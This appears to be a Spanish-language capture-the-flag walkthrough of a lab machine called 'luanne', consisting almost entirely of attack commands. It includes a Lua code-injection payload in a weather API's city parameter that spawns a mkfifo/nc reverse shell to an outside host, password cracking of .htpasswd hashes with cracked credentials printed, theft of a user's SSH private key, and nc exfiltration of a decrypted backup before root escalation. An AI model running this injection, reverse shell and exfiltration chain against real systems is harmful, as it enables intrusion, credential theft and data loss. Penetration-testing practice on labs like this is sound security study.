nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-imeout=15 -v

nmap -sC -sV -O -p- -oA luanne 10.129.151.88

nmap -sU -O -p- -oA luanne-udp 10.129.151.88

nikto -h 10.129.151.88 :80

whatweb http://10.129.151.88

http://10.129.151.88/robots.txt

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ

http://10.129.151.88/weather/forecast

curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq

Abrimos burpsuite y interceptamos

GET /weather/forecast?city=list

GET /weather/forecast?city=list']%3b+os.execute['id']--+-'

nc -lvnp 443

GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'

Le hacemos Ctrl +U para ulrencode

cat .htpasswd

guardamos el webapi_user y su contrasena en un archivo llamado hash

john --wordlist=/usr/share/wordlists/rockyou..txt hash

Credenciales-> webapi_user:iamthebest

ps -auwx

curl -s -X GET http://127.0.0.1:3001

curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo

Creamos un id_rsa

chmod 600 id_rsa

ssh -i id_rsa r.michaels@10.129.151.88

cd backups

cat devel_backup-2020-09-16.tar.gz.enc

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz

nc 10.10.14.21 < backup.tar.gz

nc -lvnp 443 > backup.tar.gz

cat .htpasswd

vim hash2

john --worldlist=/usr/share/worldlists/rockyou.txt hash2

Credenciales->root:littlebear

doas su root